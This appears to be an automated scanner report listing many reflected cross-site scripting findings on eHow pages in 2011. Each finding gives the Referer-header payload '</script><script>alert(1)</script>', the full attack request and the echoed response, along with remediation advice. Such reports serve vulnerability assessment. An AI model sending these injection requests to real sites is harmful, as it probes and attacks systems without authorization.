The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3bef</script><script>alert(1)</script>29fd0f6f1e2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_745_capture-enduring-wedding-photos.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=d3bef</script><script>alert(1)</script>29fd0f6f1e2
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99a28</script><script>alert(1)</script>52e623cc62d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_7853_floor-fountains-guide.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=99a28</script><script>alert(1)</script>52e623cc62d
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:34 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=7853; expires=Thu, 02-Feb-2012 15:16:34 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 40979
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14171</script><script>alert(1)</script>ec64a979418 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_7992_floor-water-fountains-101.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=14171</script><script>alert(1)</script>ec64a979418
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:32 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=7992; expires=Thu, 02-Feb-2012 15:16:32 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 38141
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14963</script><script>alert(1)</script>b358eea976 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_8016_outdoor-garden-fountains-guide.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=14963</script><script>alert(1)</script>b358eea976
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:07 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=8016; expires=Thu, 02-Feb-2012 15:16:07 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 40923
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 506a1</script><script>alert(1)</script>22a7977a460 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_8047_water-garden-fountains-101.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=506a1</script><script>alert(1)</script>22a7977a460
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb9af</script><script>alert(1)</script>afc6118e907 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /toys-and-games/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=cb9af</script><script>alert(1)</script>afc6118e907
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:26 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72435
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Toys & Games - How To Information | eHow.com</tit ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 512f2</script><script>alert(1)</script>feeb99e195a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /unavailable.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=512f2</script><script>alert(1)</script>feeb99e195a
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:17:13 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 23094
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Browse How to Videos and How to Articles | ehow.c ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dd94</script><script>alert(1)</script>26c420d0b66 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /us-travel/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=9dd94</script><script>alert(1)</script>26c420d0b66
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:25 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75108
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>US Travel - How To Information | eHow.com</title> ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 554d2</script><script>alert(1)</script>ca7a2c01173 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /vacations-and-travel-planning/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=554d2</script><script>alert(1)</script>ca7a2c01173
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:26 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75405
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Vacations & Travel Planning - How To Information ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a348</script><script>alert(1)</script>3f3991beec1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video_6598099_make-sugar-spice-scrub.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=9a348</script><script>alert(1)</script>3f3991beec1
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:01 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 83517
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Make a Sugar & Spice Scrub: Gorgeously Gre ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0e92</script><script>alert(1)</script>0488b8fbc31 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video_6976779_sensational-snacks.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=a0e92</script><script>alert(1)</script>0488b8fbc31
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:57 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 74807
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38ddd</script><script>alert(1)</script>7cb44e64c8b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video_7199214_onion-flatbread-recipe.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=38ddd</script><script>alert(1)</script>7cb44e64c8b
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:00 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 84886
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45ee5</script><script>alert(1)</script>a202cf207b6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videos.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=45ee5</script><script>alert(1)</script>a202cf207b6
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:24 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 81054
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How To Videos: Instructional, DIY & How To Video ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe1f3</script><script>alert(1)</script>bfeaf58b908 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /weddings-and-parties/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=fe1f3</script><script>alert(1)</script>bfeaf58b908
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:25 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72253
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Weddings & Parties - How To Information | eHow.co ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b840b</script><script>alert(1)</script>8ba33d5bdf1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /weight-management-and-body-image/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=b840b</script><script>alert(1)</script>8ba33d5bdf1
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:26 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72033
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Weight Management & Body Image - How To Informati ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1e97</script><script>alert(1)</script>0fc653e07d5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /winterize-a-garden/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=e1e97</script><script>alert(1)</script>0fc653e07d5
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:24 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 65547
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d4de</script><script>alert(1)</script>62a90938785 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /WebResource.axd HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=3d4de</script><script>alert(1)</script>62a90938785
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Date: Wed, 02 Feb 2011 15:46:22 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 28888
